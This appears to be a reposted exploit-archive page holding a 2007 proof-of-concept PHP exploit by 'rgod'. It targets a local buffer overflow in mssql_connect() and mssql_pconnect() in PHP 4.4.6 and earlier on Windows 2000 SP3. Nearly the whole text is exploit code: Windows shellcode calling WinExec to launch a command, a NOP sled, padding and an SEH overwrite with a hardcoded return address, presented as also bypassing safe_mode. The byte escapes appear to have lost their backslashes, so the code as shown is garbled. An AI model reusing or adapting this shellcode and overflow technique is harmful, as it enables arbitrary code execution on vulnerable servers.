Home / os / solaris

php_446_mssql_connect_bof.txt

Posted on 09 March 2007

<?php // PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow // poc exploit (and safe_mode bypass) // windows 2000 sp3 en / seh overwrite // by rgod // site: http://retrogod.altervista.org // u can easily adjust for php5 // this as my little contribute to MOPB $____scode= "xebx1b". "x5b". "x31xc0". "x50". "x31xc0". "x88x43x59". "x53". "xbbxcax73xe9x77". //WinExec "xffxd3". "x31xc0". "x50". "xbbx5cxcfxe9x77". //ExitProcess "xffxd3". "xe8xe0xffxffxff". "x63x6dx64". "x2e". "x65". "x78x65". "x20x2f". "x63x20". "start notepad & "; $eip="xdcxf5x12"; $____suntzu=str_repeat("x90",100); $____suntzu.=$____scode; $____suntzu.=str_repeat("a",2460 - strlen($____scode)); $____suntzu.=$eip; mssql_pconnect($____suntzu); ?> original url: http://retrogod.altervista.org/php_446_mssql_connect_bof.html

 

TOP